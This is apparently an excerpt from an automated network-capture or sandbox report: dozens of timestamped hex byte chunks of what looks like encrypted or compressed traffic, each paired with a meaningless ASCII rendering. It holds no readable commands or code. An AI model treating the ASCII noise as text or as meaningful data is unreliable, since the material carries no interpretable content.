3d c9 29 f1 c7 5b f5 5e 59 0e dc 91 3f 1b 33
                                          Data Ascii: kHPo"*zZ!R<Z&LDsbS_oa'.l{_-rZu/n2-*#g0@x}D:c,0AnDCqY!o8[S2E>"`r>=3 ^A3+V,G1tp?5pjV6$_cx|nX.uP'I#TV=)[^Y?3
                                          2021-09-28 06:58:06 UTC38INData Raw: 72 69 69 59 8d 9c d8 45 92 e0 d1 d5 27 29 78 9c 28 48 a0 78 a2 10 3c 63 5f f1 f9 1a 33 1b 06 df 7f eb c2 6b 36 5c 32 17 25 bf 19 36 47 fb 2a 6a c8 29 e8 23 73 ac 4a b0 25 5d 0c cf 66 6f 80 a9 1a 69 d5 c0 80 88 9c 16 9d e2 ee 1c 3f bf 1c ea 3e a3 cf ad 58 a0 9e 1d 0b 07 d8 92 06 59 90 ed 1d 07 1b 05 28 fe 5a 17 49 eb 3c 2e 73 9f 7c bb 57 09 11 a3 fd 90 d1 dc bc d9 d3 e4 46 68 97 a2 42 67 d1 8c 93 2c e9 a3 e5 02 83 45 61 78 81 41 99 4b 7b bb c3 d4 bd 23 0c ed fd 5c ae 55 f4 56 d3 89 60 6b 68 e5 ae 7b f6 31 47 07 de 59 a4 f0 b7 33 3a f1 ad 4e fc 45 77 6c 37 0f ed 11 90 ab 15 5b 69 00 d0 cd 5e 3f 4e 8e e1 72 67 d3 38 8d d1 6e fb d0 bc ac ae 15 de 5f ef 60 03 b8 7a 9b a7 eb c8 30 b6 71 2e 89 96 b1 47 68 62 7d 81 70 e5 9b d7 fb 7d 40 e1 b3 53 7f 34 82 b9 dc 0c
                                          Data Ascii: riiYE')x(Hx<c_3k6\2%6G*j)#sJ%]foi?>XY(ZI<.s|WFhBg,EaxAK{#\UV`kh{1GY3:NEwl7[i^?Nrg8n_`z0q.Ghb}p}@S4
                                          2021-09-28 06:58:06 UTC39INData Raw: 5d c9 85 c0 c2 78 0c 5c 23 5f b2 9f 5a 7a c0 26 54 79 0b 75 d0 e7 6b 90 84 51 b5 c8 cb 8a ac 75 18 79 f9 9a 23 bf 47 49 b8 35 c2 d2 ea 15 5d f1 e4 5f 0c f2 94 30 1b 3d 12 5d 6a 58 b8 57 f8 f0 fa e6 bc 32 d1 3b 45 8f ac b8 fe 14 cf 8c 23 cc 5b 60 28 fa 38 36 7a 15 a6 d1 2a f1 93 9b 7a ff b3 93 bc 93 e5 e6 5c e7 cb 55 1e be 99 a3 e7 df 1b 22 20 3f fa 65 ef d7 44 49 55 c1 59 58 a8 7e 4c 86 6a 89 b7 cc 97 fd 81 ec 09 1d 73 af eb 43 3d b4 0b cf 2a e4 ff c7 fa 25 cd d9 dc 7b 6e e4 b0 91 b9 2d fc 92 d2 2c 26 9d ac 0e e2 2f b1 ca ef 6e 68 4c 08 47 66 ac 46 09 f8 a9 ba fd 16 a9 de 18 d2 8c 70 f4 8f d1 6b 2e 6a c0 bd 63 c4 c0 87 f2 64 19 81 79 bd 70 8a a9 74 04 aa d2 a2 30 f5 85 24 ed e1 6a 09 76 aa 72 65 46 44 46 8c bf a1 c6 73 fd 7d 05 d5 f9 dd 10 d3 bf 3e 52 e2
                                          Data Ascii: ]x\#_Zz&TyukQuy#GI5]_0=]jXW2;E#[`(86z*z\U" ?eDIUYX~LjsC=*%{n-,&/nhLGfFpk.jcdypt0$jvreFDFs}>R
                                          2021-09-28 06:58:06 UTC40INData Raw: 75 5d 8e e7 5a de 87 38 0e 22 4d ea ca b6 84 e3 0d ee 5d c7 79 03 b8 70 d4 9d ea d9 38 9d 50 61 e5 5f b7 6f db 76 4e 85 4c ec b3 40 f1 55 04 ca f4 54 57 1a 80 d6 4e 63 b5 9c 73 c3 b5 73 1a f7 e5 35 95 7c 59 ac d7 3b ed ff 0d 42 0d d6 b5 cf cd a2 eb 8f d9 bd 42 d5 9d 39 ef 60 26 51 63 7c a0 18 dc c9 99 43 57 9f 67 10 60 cd 42 5f 14 2e 6f dd b2 e7 52 7a 8b 2f cb 02 5f b4 e9 aa b4 52 12 2b c4 55 c3 d8 47 9a 1b 7c 42 77 ae 13 2c ca cf 48 14 13 19 00 af 9e a0 2e 9a 68 c6 a7 a1 4f ee f7 85 18 08 32 67 b4 b4 14 a9 ff 77 b4 0c a9 53 30 40 d0 1a 6f 24 29 d4 28 27 9e 01 de f2 49 d7 d6 df 60 cd e9 93 01 9d 16 50 cc 1e 38 e0 6b 78 40 55 60 7f 2f 27 10 7d 27 e6 55 50 50 b5 29 21 bc 71 df 92 b0 5a 38 a1 46 4f 0d cc e8 2b e2 15 a7 4b 56 20 79 22 35 81 9b cc 3e 22 18 ea
                                          Data Ascii: u]Z8"M]yp8Pa_ovNL@UTWNcss5|Y;BB9`&Qc|CWg`B_.oRz/_R+UG|Bw,H.hO2gwS0@o$)('I`P8kx@U`/'}'UPP)!qZ8FO+KV y"5>"
                                          2021-09-28 06:58:06 UTC41INData Raw: f8 49 77 77 c2 a0 7b 57 c1 6f f9 75 30 f1 0d be 61 8e ee 55 05 aa de b8 49 5d ac 0c 92 e8 6d 60 8d 3d 73 6f 5f 5b 79 b7 c4 9a 78 74 92 e5 15 db e2 c1 80 cc 9f 3e 14 e1 19 f2 93 11 32 86 9e 86 4f bb f3 e7 39 f2 5e 1a 1d 5f b5 2a 38 62 e8 76 36 e2 4a b7 23 a9 8b 33 a2 d9 e9 19 88 9e 03 52 d2 1d 35 72 8d b3 61 56 40 41 22 dd 9c de 7c 2d 5e d0 df 30 0b 57 fe 55 2b a6 17 3e 39 12 6b 4e fd c3 1d 19 66 03 b0 be c2 55 6c 31 2d 2d 3f 0d c5 6e 7b 41 94 b3 61 16 29 fe 05 67 82 0d 98 26 5d 00 3b f7 44 80 a3 0a 50 c1 af 1a 89 9a 1c af d9 e6 01 e5 ac 36 f9 2e ab bd ae 54 a2 96 cd 15 07 d8 82 06 09 93 ed 11 25 1c 32 29 f4 78 0d 4e c3 73 3e 7d 8b 59 13 5b 66 02 8b de 9a f9 41 95 9f da f6 42 68 2a a3 42 67 6e fc 92 2c e2 8c d9 45 80 4f 4f 50 39 43 93 27 85 b0 c0 d5 b7 01
                                          Data Ascii: Iww{Wou0aUI]m`=so_[yxt>2O9^_*8bv6J#3R5raV@A"|-^0WU+>9kNfUl1--?n{Aa)g&];DP6.T%2)xNs>}Y[fABh*Bgn,EOOP9C'
                                          2021-09-28 06:58:06 UTC43INData Raw: 16 48 bd ae cd 33 13 ec 78 7d 4a 6c 11 63 d1 2c 14 69 31 eb 41 50 50 aa 2f 37 aa 8f cf b4 a0 a6 11 07 53 40 07 f7 75 37 f1 1a b8 4a 39 ee af 20 18 88 e2 7a 22 31 18 e0 fd 78 93 90 51 ab b0 2a b7 74 d9 bd da b7 38 94 00 91 4d 63 e6 2b ee 32 34 c4 c8 ee 55 a2 a6 30 71 71 ba 27 1b b1 29 bb 43 3b 80 71 a4 2e f1 4a 26 80 e5 5f 60 00 53 2f 45 a1 84 5f 76 34 38 74 82 1c 54 dc e5 6b b8 22 54 aa cc b9 a4 80 7c 21 f4 fc 85 2e b3 42 5a ac 3f cc cf 0e ea 70 c6 f6 89 44 da 8a 32 33 2f 3a 79 60 70 c6 39 34 fa d2 fd a7 21 de 28 51 95 ae 55 f5 38 d0 84 14 f1 a5 61 0e d2 17 e1 20 eb ba c8 a3 ce 82 9e 6c 12 b7 a0 ac 98 fc e3 4d fc d1 59 1e be 99 b9 e3 df 37 22 20 3f 65 dc f2 c4 40 5a 41 db 56 b5 a3 52 54 b4 7a 6b b6 32 a4 fd aa 72 08 0c 76 af fe ae 36 98 0f c3 3d c3 1f c5
                                          Data Ascii: H3x}Jlc,i1APP/7S@u7J9 z"1xQ*t8Mc+24U0qq')C;q.J&_`S/E_v48tTk"T|!.BZ?pD23/:y`p94!(QU8a lMY7" ?e@ZAVRTzk2rv6=
                                          2021-09-28 06:58:06 UTC44INData Raw: 1b 0b 7b 36 57 6d 50 1c 44 d0 7f 3b 62 9e 3b 8a 54 09 11 9c 04 83 c1 c5 9d a7 17 e4 40 40 a2 a5 53 64 96 d7 91 2c e5 cb 47 44 80 43 74 5a 29 44 88 44 7b fa c0 d4 b1 64 ce ef fd 5c 95 7a e5 50 cd 18 5b 7b 6e 91 3a 53 bf 38 51 29 d8 e0 a6 fa a7 e5 18 91 81 61 c5 0a 58 4d 19 60 c8 11 9a b0 7d 70 61 28 b9 c9 76 72 22 04 e6 5a d8 be a0 8b f9 47 ea d5 9e 33 e2 16 d8 4a c1 55 09 90 ff f5 9d e0 e5 79 a0 52 4b 05 97 b7 65 fc 5a 6c 81 74 f0 e8 f5 f3 55 08 f1 bf 44 5b 01 88 d6 fe 61 b5 90 76 d9 8c ea 74 d3 ed 5a 84 6c 55 b7 db 8a c5 d5 3a 44 1c d0 89 4a e6 9a ed e0 f9 61 42 d5 b1 28 e3 0f 3f 40 63 76 88 36 d0 c9 80 7d 51 4f 72 35 48 fb 51 6f 1d 3d 35 f4 8a e7 09 70 55 3e cc 18 4d 5a b2 a2 a5 5b 03 2a ff 7a 33 d9 b9 a7 1f 18 28 64 a0 08 08 c4 d0 d5 a6 2c a0 fb 4f 6c
                                          Data Ascii: {6WmPD;b;T@@Sd,GDCtZ)DD{d\zP[{n:S8Q)aXM`}pa(vr"ZG3JUyRKeZltUD[avtZlU:DJaB(?@cv6}QOr5HQo=5pU>MZ[*z3(d,Ol
                                          2021-09-28 06:58:06 UTC45INData Raw: 97 97 88 8b f6 e9 4f f8 e6 71 e0 bf bf 76 e5 e6 9d 34 f6 26 e5 70 fe d5 52 77 b8 3a b8 59 b8 43 52 68 76 67 59 22 99 e6 1c 5e 36 6a 88 4f 1f bb 16 98 1e c9 23 d0 e1 c4 fa 23 7b fd d7 d2 64 99 66 91 b9 26 e3 9e ec 28 e1 78 a8 17 06 2e 9d c8 eb 4d 6b 4c 87 42 79 bc 8d 08 d4 ba 87 eb 2a 24 af e7 2d 8a 1f 36 8b c8 9f 05 58 c9 b0 51 4e 77 78 29 69 15 c3 6a b9 61 99 85 d6 fa ab f8 b8 45 47 87 2c 76 e8 65 65 2b 1d 2f fe 34 d6 4c 8c b6 99 69 76 e7 83 15 f7 ed fb 81 c5 a5 12 63 f3 1d e9 45 87 1f 81 9c 9e 57 45 95 f7 3d f4 20 86 0b a1 be 17 31 68 d2 5a 4f f0 4e ad f5 3f a6 34 a0 df 16 3d ef 8e 07 54 ac 81 2c 8c 86 8e 7b 46 e7 de 4e 04 8b 0e d9 91 5f d0 d4 2b 3b 6c 86 56 3a a4 6e 58 39 3e 62 48 e4 d5 34 20 1f 1e 4e b9 c6 c0 46 34 1f 50 e9 da 44 6b 51 47 fb 30 50 13
                                          Data Ascii: Oqv4&pRw:YCRhvgY"^6jO##{df&(x.MkLBy*$-6XQNwx)ijaEG,vee+/4LivcEWE= 1hZON?4=T,{FN_+;lV:nX9>bH4 NF4PDkQG0P
                                          2021-09-28 06:58:06 UTC47INData Raw: bc 3a d2 c7 9c 6e 57 90 7d 10 50 cc 4d 23 17 20 22 dc b2 e6 12 4a 88 3e 81 11 5a 8c ff ab b4 43 61 80 c1 4a c6 2c 40 c8 3e 0e fe 73 86 0e 04 d5 d9 73 48 10 08 03 98 8b 5c 2f b0 09 09 b6 a5 cb 87 c6 74 30 3f 32 78 b0 ab 39 91 ee 72 a4 2c a8 79 5a 69 d3 32 01 0f 3e d0 00 05 b6 58 d7 9d 83 ff cf d7 7b d8 83 55 10 98 0b 70 c3 17 13 cf 78 7d 4a 49 4d 5a d1 26 36 a6 31 ed 61 42 49 b5 38 24 a0 89 de a2 99 58 1e 31 47 4f 06 df ec 06 f1 0c eb 5a 5d 22 87 23 18 93 d8 73 3e 7e 12 e0 ec 2c 8c 9a be d9 26 23 8f 34 d1 bb a4 98 32 87 0e b9 4b 6b f9 26 38 68 1b d5 c8 ee e9 a1 a6 3c 92 9c ba 27 10 7c 22 81 67 1f 8a 71 bf 28 c6 6c d8 81 c3 86 74 15 28 00 5b b2 8a 77 70 3c 27 7e 54 46 7b ce f2 46 89 97 54 ac a9 f3 8b 80 76 fe e9 dc b2 14 a0 48 50 b0 1d eb d7 f0 e1 82 dd f6
                                          Data Ascii: :nW}PM# "J>ZCaJ,@>ssH\/t0?2x9r,yZi2>X{Upx}JIMZ&61aBI8$X1GOZ]"#s>~,&#42Kk&8h<'|"gq(lt([wp<'~TF{FTvHP
                                          2021-09-28 06:58:06 UTC48INData Raw: 95 19 34 72 8d 8a fe 44 69 63 36 6b 9d d8 5e d5 d8 d1 d5 2b 35 10 0a 57 2b aa 17 2f 39 12 6b 4c f2 f9 9a 32 1b 06 c3 3c eb c2 67 39 36 39 3e be bb 6d 71 6f 54 28 60 10 0b 74 0f 75 a1 0d 7b 25 5d 0c 3b f5 45 80 a3 74 cc d4 c0 88 e7 1d 17 b9 c2 f9 79 b7 be 1c e0 4a 1a ca ad 5e b1 9a 15 4e 02 f0 18 2e 1d 99 c5 b1 0e 68 35 01 65 50 1c 44 eb e5 2d 73 93 5f 05 7d 38 17 8b d4 a9 07 d6 94 9f d7 97 cd 41 b3 a4 51 63 60 a2 b7 04 d4 a4 cd 4f 93 4a 61 5d 10 7b 99 4d 59 45 79 d4 b7 0b 55 e0 d5 f1 85 71 f2 39 5e e7 5a 6c 45 ed af 79 a9 23 49 6e 7e e1 a6 f6 a6 c1 0a e6 be 54 ec 83 74 6c 31 36 c7 00 80 b6 15 e8 69 00 dc d9 67 65 43 9f f7 40 b1 58 39 8b ff 5e e8 c1 b8 95 f2 0f b1 d0 c6 44 05 ab 62 e5 8c c2 47 3b b1 53 4e c2 87 a4 47 5e 61 7d 8d 75 f9 8a c5 d9 da 0f e2 b9
                                          Data Ascii: 4rDic6k^+5W+/9kL2<g969>mqoT(`tu{%];EtyJ^N.h5ePD-s_}8AQc`OJa]{MYEyUq9^ZlEy#In~Ttl16igeC@X9^DbG;SNG^a}u
                                          2021-09-28 06:58:06 UTC49INData Raw: 54 3e 16 60 b3 38 f8 c8 c9 87 d4 4e e8 02 50 2e 4c 2e 9f 59 78 37 31 e4 6d 1b 67 c4 e2 f2 81 93 4b a1 d0 a9 9a 86 63 2c f1 65 8b 25 bf 45 4c 21 24 d5 c8 fe fd c0 cc f6 46 01 cc 16 22 1d 30 49 54 6b 58 b8 35 3d e7 95 c6 a6 21 de 32 43 e5 9e 47 ff 32 c8 8d 0c 8c 9c 61 22 c9 1d e1 12 ea ba c8 27 e5 aa 23 6e 01 b4 a6 32 8c f6 e3 5d e5 c9 58 e7 a9 b7 0a f4 f0 86 35 ac 0a e9 61 f3 66 50 4e 5c c6 c9 11 25 6d 45 be 64 d4 59 34 9b fc 83 e1 1d 18 6f 3d cf bd 3c 99 0d c0 33 c5 f7 d3 66 32 ec ea ca e7 75 82 64 87 25 36 ea b6 62 29 26 86 b8 11 0a be b1 e8 e9 75 7b d6 31 53 79 bc b2 d8 c6 ab 91 e3 06 08 20 e7 27 a2 2b 26 8f db 15 16 74 c2 bd ad cb c0 6f 87 76 19 d9 62 d2 76 89 81 c7 17 ae c5 ad 57 67 3b 27 e7 ed 7a eb a2 aa 72 6e 46 42 41 97 a4 86 68 fe c2 7d 14 da 4a
                                          Data Ascii: T>`8NP.L.Yx71mgKc,e%EL!$F"0ITkX5=!2CG2a"'#n2]X5afPN\%mEdY4o=<3f2ud%6b)&u{1Sy '+&tovbvWg;'zrnFBAh}J
                                          2021-09-28 06:58:06 UTC50INData Raw: b6 aa 50 38 ea 44 4f 01 f7 26 37 f1 1a 8f 91 52 38 8d 4c d5 89 e8 7a 2d 24 1b c8 70 72 8c 90 87 bc 9e 23 89 2d dc ac dd 85 34 81 01 4c 35 6b f9 20 06 22 1e c2 14 d5 e3 b0 ad 02 c4 58 ba 27 0b aa 04 66 4c 28 8c 59 74 27 ee 52 c9 8a e1 a5 74 13 50 27 d7 ed 8e 5f 66 2d 34 69 6f 0b 67 c3 69 7f 83 fa 1d ab c6 3f 98 8c 6d 2c f1 63 96 32 ac 5f c0 ae 30 a0 21 f1 eb 5a ce f9 48 07 cb 86 29 81 13 5c 78 6a 52 dd cf 35 f0 fc ff aa 30 d9 2f 7c 49 b4 46 f9 2f 4c 89 0b e3 5a 73 36 d2 05 df 93 66 85 c2 2f f0 20 8f 79 15 a6 ab 97 28 f6 e3 56 e2 e6 8a e3 bf b3 bf 68 f0 91 23 21 26 fc 70 e7 d2 56 c5 7b c4 47 a7 0b 43 50 aa 71 62 60 90 88 f4 98 fd 21 cf 75 b0 e6 aa b1 9f 1e c9 23 df f7 d5 ec 35 f2 71 e3 7b 64 8a de 80 af 33 f7 8a e9 8a 26 8c a3 0c 34 ea 9e c9 fe 6b e0 4b 19
                                          Data Ascii: P8DO&7R8Lz-$pr#-4L5k "X'fL(Yt'RtP'_f-4iogi?m,c2_0!ZH)\xjR50/|IF/LZs6f/ y(Vh#!&pV{GCPqb`!u#5q{d3&4kK
                                          2021-09-28 06:58:06 UTC51INData Raw: be b2 8e 4a 64 a4 60 9f 33 e8 b7 c8 45 91 40 7c ae 39 6f 9c 66 04 84 d0 d1 b7 1a 41 f1 f4 a4 87 5d fc 50 ce 30 50 75 62 fc ac 53 ae 37 59 ff f7 cc 94 f8 b3 12 03 9e 42 44 d4 05 6b 7c 19 08 c8 11 9a a2 7c 76 07 ef da ca 7c 5c 98 8f e7 50 bf f9 eb 8a f9 47 d3 04 b7 84 e8 3e fa 59 c7 4e 0f a7 79 e7 98 ea d9 3f ae 52 9d 8b ba be 66 c0 64 4c 9e 47 ca 88 d2 f1 44 0b ff 4d 54 7b 15 94 b3 c8 70 b0 96 76 d0 81 1f 1a db e3 5c 80 12 90 a6 dd ef d1 49 27 51 08 dc b0 c0 fd 64 ea a3 da 4b 6c d1 b7 3f e3 79 34 44 63 6d a5 01 2c c8 aa 6b 41 9b 67 03 65 cc 40 6a 00 d0 39 f0 b1 ff 1a 7f 8b 2f d8 07 a4 8d 8d a8 a3 41 17 3a d0 4f d3 2a b8 b7 3d 0d d5 72 96 10 f9 2a 20 53 3b 13 08 05 a3 a3 5a 2f 57 67 cf b6 ca c1 59 d9 47 0b 02 0a b5 bb a7 11 a9 ff 78 b1 fe 56 7e 08 4a db 1a
                                          Data Ascii: Jd`3E@|9ofA]P0PubS7YBDk||v|\PG>YNy?RfdLGDMT{pv\I'QdKl?y4Dcm,kAge@j9/A:O*=r* S;Z/WgYGxV~J
                                          2021-09-28 06:58:06 UTC52INData Raw: a5 a9 54 2a 0c 64 76 42 47 9a f4 92 f2 1a 04 64 b8 f1 b5 b2 2f 09 13 0a ca e1 c4 d1 32 e2 ec d4 53 84 8b 7c 97 aa 2e 90 bc c3 29 20 9f a3 09 16 3f 98 e1 26 7d 6d 4a 76 6a 7b bc be 19 de ba 9a 97 0a 1e 20 e1 3c 80 0e 2e e0 f7 63 04 72 d3 ac 7b 1d c3 6f f5 0b 33 db 79 bb bf 84 a9 fa 04 aa de 81 7b 4f 85 2e 39 eb 7c 6b b2 7c 61 62 44 47 41 91 3c 2e 47 41 02 82 eb 05 fd f5 a2 e9 b6 16 69 f1 15 87 01 86 33 8c 9f bf 5e 93 8b ee e7 f6 37 a8 1b 75 fe 77 32 70 c1 5e 4f e1 4c b1 0b 3e 91 33 a8 c8 e1 31 f2 9d 17 54 bd 85 2e 72 87 a3 6b 44 69 69 06 de 9c d8 fd ba 5f d0 dd 20 22 7f 8e 56 2b a0 62 a6 38 13 61 5f f7 d1 32 31 1b 00 91 b9 ea c2 4a 30 27 3c 03 25 bb 6d 61 47 fb 2a 73 26 20 ef 2c 74 ab 25 95 25 5d 17 05 73 42 b8 ab 1a 79 d5 c0 93 8f 86 e8 b8 e4 e8 1f 2c b9
                                          Data Ascii: T*dvBGd/2S|.) ?&}mJvj{ <.cr{o3y{O.9|k|abDGA<.GAi3^7uw2p^OL>31T.rkDii_ "V+b8a_21J0'<%maG*s& ,t%%]sBy,
                                          2021-09-28 06:58:06 UTC54INData Raw: ac 9e 52 12 7b f5 4a cc 24 46 b6 11 59 fe 77 ae 53 07 d5 df fb 10 13 08 13 b0 93 5e 2f b6 66 cf b6 a5 c1 59 ce 51 18 08 f1 79 ba a7 d8 a8 ee 72 bb f2 a8 7f 3e 46 d2 33 1e 17 2c d2 68 02 9e 01 a1 9d 85 c6 a5 6f 7b de e6 99 38 76 02 ae cb 3e 45 c4 78 7d 4a 4c 0a d2 d0 26 36 75 38 84 fa 42 55 bf 2b 28 b6 9c d5 86 ae 59 10 2b 56 43 16 d4 76 25 f5 19 b6 5e 3c 88 86 23 13 9b ed 61 3b 0f 17 3d 19 72 8c 9a be af b4 cc 8c 3e dd d2 68 a9 33 8d 22 0d 5c 69 f3 33 16 22 1e fd 41 c7 f1 a9 8a 3f 20 8e ba 27 1a b3 29 8c bf 2b 8a 77 da 96 ef 54 d2 a9 55 58 74 19 45 3a 4b b8 9f 5a 4f a9 24 78 7a 72 ca cf f4 64 b8 09 54 aa cc 24 8d a8 0f 21 e7 ff 89 24 b1 4d 72 4c 36 d3 d1 9f 59 5d dd fa 71 92 da 8a 39 08 33 2b 7f 42 bd b1 38 32 e1 ff c4 55 22 d4 3d 7c 79 b4 46 f9 57 1e 8f
                                          Data Ascii: R{J$FYwS^/fYQyr>F3,ho{8v>Ex}JL&6u8BU+(Y+VCv%^<#a;=r>h3"\i3"A? ')+wTUXtE:KZO$xzrdT$!$MrL6Y]q93+B82U"=|yFW
                                          2021-09-28 06:58:06 UTC55INData Raw: 1d 77 40 ca 4c 25 3e 74 49 b1 b8 e0 d1 67 2e 35 2f 04 25 aa 7f 63 b9 fa 07 79 3e 3e ec 0f 73 83 06 e7 25 57 2e ec 63 45 86 81 3f 79 d5 ca 91 8c 83 05 ab c8 ff 04 20 a9 e2 eb 09 99 da a7 43 38 8d 11 40 10 cb 91 2e 0c 81 f2 38 f3 69 1f 24 ef 58 0d 4b ac 5f 2f 73 9f 4b 26 46 1b 17 9a cc 8f cb 28 95 b3 db cc 41 44 b3 a4 51 68 a1 ad 81 3e e3 b5 df 5a 9b bb 66 7c 31 7b 55 b3 ac 67 dc c8 a4 19 44 ff ef 43 78 70 d8 5f aa 5c 5a 6a 62 e5 b3 40 ad 32 56 13 e9 c5 58 f1 9d 17 1f e0 a5 2b cc 0e 74 66 2e 01 da 03 90 b0 68 7e 65 fe db e6 7e 65 44 9d f6 45 d0 c2 2a 8b e8 5f e4 f6 48 85 ce 1c cf 54 d0 92 10 b5 6f d3 8e f8 c8 2b a3 46 41 74 97 9b 62 c0 68 6c 81 37 e2 99 d7 f7 4a 2d f1 a1 55 46 02 9d ae 28 62 99 87 76 d9 f2 28 1b f7 e5 42 bc 10 a6 59 22 fa fb c4 28 42 1c ce
                                          Data Ascii: w@L%>tIg.5/%cy>>s%W.cE?y C8@.8i$XK_/sK&F(ADQh>Zf|1{UgDCxp_\Zjb@2VX+tf.h~e~eDE*_HTo+FAtbhl7J-UF(bv(BY"(B
                                          2021-09-28 06:58:06 UTC56INData Raw: 50 8d 6a ab 55 d7 3c 9c 56 6f 29 f6 f0 8b 30 9e eb a7 42 ca 0d c2 d5 c3 6b dd f0 53 1d c8 f9 89 1b 3b 30 74 42 60 b2 38 3e 2e f8 ea 8d 28 fe 3b 15 96 b7 46 ff 38 c1 8e 2a e3 5b 60 e7 c1 11 c9 63 e8 ba c2 3a f1 82 9e 77 01 b2 be a4 bb f1 e3 df f4 ce 49 9a bf b5 b9 96 4d 91 23 2a 3f c1 3a f2 c4 47 26 a0 c5 47 ac ba 56 3b 82 65 76 42 3e a0 da 90 e9 0f 00 08 8c e0 bd 36 b0 13 cd 22 ca 8e 74 fb 23 ef f0 d5 14 d5 8a 7c 9b aa 22 ea f1 fe 29 26 86 b8 1d 0f 38 8b da ed 45 78 4e 19 42 68 aa a9 1d 4e b8 9e d0 20 18 20 e1 3c 85 37 03 8f d1 6b 2c 7b c6 a6 55 e8 ee 6d f3 62 31 3c 78 bd 6b a0 1d cd 04 a0 c7 a5 52 43 ea c0 e6 eb 67 75 a2 bb 7e 00 9c 4a 50 95 de ba 78 72 fd 7d 14 db f8 90 d1 f6 27 16 63 e8 ae e3 6d 0b 26 86 94 96 75 9e a0 a2 28 e4 20 85 0b 77 59 3a 32 7a
                                          Data Ascii: PjU<Vo)0BkS;0tB`8>.(;F8*[`c:wIM#*?:G&GV;evB>6"t#|")&8ExNBhN <7k,{Umb1<xkRCgu~JPxr}'cm&u( wY:2z
                                          2021-09-28 06:58:06 UTC57INData Raw: d7 5a f6 9d ec ce 2b b8 36 7b 8b 96 bd b1 de 45 55 b0 58 c6 91 c4 fb 7d 36 e2 b3 5f 89 10 5c ac f3 4b 82 96 67 df 8e ea 68 4d ef 5a 88 76 71 9e dd e5 e9 09 38 44 27 db 8b c5 e5 9a aa bb d3 63 42 d3 b7 39 54 60 27 41 27 7c a0 18 2d c9 86 6e 58 91 7d 10 7a cc 51 6e 17 2e 38 dc b4 e7 09 7a 81 3f dd 11 4a 8d a1 ab a1 52 12 3a db 4a cc 27 5d 86 15 0f 91 75 ae 19 7a d5 df 4a 62 a9 08 05 ba 99 76 01 b4 66 c9 ba d6 da 58 c8 57 13 20 13 7c ba a1 39 8a ee 72 a4 da 8a 7b 24 40 fa 16 05 27 23 fa 31 03 9e 0b f8 81 82 ff f7 d1 7b d8 c4 b0 10 98 0b 86 ef 36 3b fe 50 59 40 44 6f 0d cd 27 3c 7e 1a ed 38 f9 55 b5 32 0e a7 e0 69 bf bb 52 7f 93 46 4f 0d cc e5 0e 13 11 a7 5a 41 31 af 9a 18 88 e2 63 3a 51 30 e2 ec 74 9f 9f a8 bb 98 4c 35 3f db b7 b5 d6 32 87 00 fe 23 68 f9 2a
                                          Data Ascii: Z+6{EUX}6_\KghMZvq8D'cB9T`'A'|-nX}zQn.8z?JR:J']uzJbvfXW |9r{$@'#1{6;PY@Do'<~8U2iRFOZA1c:Q0tL5?2#h*
                                          2021-09-28 06:58:06 UTC59INData Raw: b2 a8 43 45 88 57 c1 ea 6d 6c b6 ac 63 69 41 62 78 9b b2 9f 6f ff fa 7d 14 da fb d8 9b d6 a0 68 07 e2 19 f0 19 97 3b 92 80 bf ae 92 8b ee 28 f2 25 aa 35 5b bf 3d 25 fd c6 5e 4f e0 59 b9 1a 36 9c 24 24 43 c0 31 f3 3f 12 5c a9 91 1c ba 86 a2 61 55 6f 7d 71 f4 98 d8 52 ad d2 d7 d5 21 23 6c 8a 47 23 b6 06 c3 38 12 65 fd e6 d9 20 25 33 c8 b1 b8 e0 d3 6b 25 0f 17 12 25 bd 7a f6 40 fb 2b 61 05 2b fe 07 63 bc a9 6b 25 5d 07 b1 71 4d 94 bd 33 b1 d4 c0 88 99 9c 02 91 e4 ea 16 39 a9 91 ed 25 93 ca b9 40 b6 b6 be 5f 07 d2 f7 a3 1d 93 ec 08 08 79 36 20 e8 59 92 f9 ac 55 2c 73 93 58 2a c2 09 17 81 d6 ff c6 d7 94 95 c3 e0 51 44 9b 3e 42 6d b4 bd 4c 3d c6 8c fa 45 80 4f 74 57 2c 48 b1 75 53 98 c9 0a b7 0c 6e ee fd 5b 96 71 f4 56 d9 f3 5a b4 9b ef b8 49 bf 32 46 1a c6 e3
                                          Data Ascii: CEWmlciAbxo}h;(%5[=%^OY6$$C1?\aUo}qR!#lG#8e %3k%%z@+a+ck%]qM39%@_y6 YU,sX*QD>BmL=EOtW,HuSn[qVZI2F
                                          2021-09-28 06:58:06 UTC60INData Raw: 53 da 12 26 a0 89 d9 af b3 37 08 2a 47 45 d9 8a 9f 14 f3 10 a1 49 5a 29 8e 0b 4e 8a e8 76 51 0a 10 e0 ea 63 85 8b a8 c5 b8 21 8f 38 ca b4 cb ad 1b 85 0b 91 5a 06 df 22 10 35 09 dc e6 85 f5 a3 a0 55 d7 58 ba 21 1d b3 25 cb 57 29 8a 7b 6b 31 cb 7c ef 81 c9 52 67 19 25 8a 5a b2 84 53 4f 06 27 78 76 c3 7a c9 de 66 ba 95 54 aa 87 29 8b 80 7c 20 e7 f9 88 23 a0 48 4c bc 35 d3 ff f1 eb 5c c8 f0 59 0e c0 8a 33 1a 28 0a 7d 6a 6f b3 38 34 71 fa ec b6 37 c7 30 6c 18 b7 46 ff 38 d0 85 11 1d 5a 4c 61 e3 11 cd 85 ea 37 e9 2f f1 83 94 7b 0d a4 b2 87 4c f6 e3 5c e0 dd 4e f6 ac bc aa ec 98 70 22 20 3f fa 69 fb d3 97 44 6c 80 43 a6 af 43 4d d1 8e 77 48 39 9b fe 83 e3 1f 23 23 98 ce bf 3c 9e 34 d2 31 c7 e1 d5 f1 3b 1b fc f0 75 66 e4 b5 91 b9 2d f9 c3 d7 07 8c 95 ba 13 1c 3f
                                          Data Ascii: S&7*GEIZ)NvQc!8Z"5UX!%W){k1|Rg%ZSO'xvzfT)| #HL5\Y3(}jo84q70lF8ZLa7/{L\Np" ?iDlCCMwH9##<41;uf-?
